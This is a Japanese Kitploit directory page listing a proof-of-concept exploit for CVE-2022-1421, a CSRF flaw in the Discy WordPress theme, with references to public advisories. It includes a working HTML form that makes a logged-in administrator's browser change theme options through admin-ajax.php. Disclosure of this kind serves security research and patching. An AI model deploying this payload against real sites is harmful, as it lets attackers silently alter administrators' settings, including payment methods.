Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-1421 — 概念実証(PoC)エクスプロイト - CVE-2022-1421、Discy WordPressテーマにおけるCSRF脆弱性。細工されたAJAXリクエストにより管理者設定の変更を可能にします。 | Kitploit
ツール/GitHubGitHub/nb1b3k/cve-2022-1421
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnb1b3k/cve-2022-1421

CVE-2022-1421

概念実証(PoC)エクスプロイト - CVE-2022-1421、Discy WordPressテーマにおけるCSRF脆弱性。細工されたAJAXリクエストにより管理者設定の変更を可能にします。

リポジトリを見る
733年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2022-1421

CVE-2022-1421の概念実証

Discy < 5.2 - CSRFによる設定更新

Discy < 5.2は一部のAJAXアクションにCSRFチェックが欠如しており、攻撃者がログイン済み管理者に対してCSRF攻撃を行い、支払い方法を含む任意のプラグイン設定を変更させることを可能にします。

影響を受けるテーマ

Discy < 5.2

POC

root@kitploit:~
<html>
  <body>
    <form action="https://target.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_update_options">
      <input type="hidden" name="data" value="discy_options[footer_copyright]=You%20are%20ultra-PWNED">
      <input type="submit" value="Submit request">
    </form>
  </body>
</html> 

参考文献

https://wpscan.com/vulnerability/a7a24e8e-9056-4967-bcad-b96cc0c5b249

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1421

ツールをダウンロード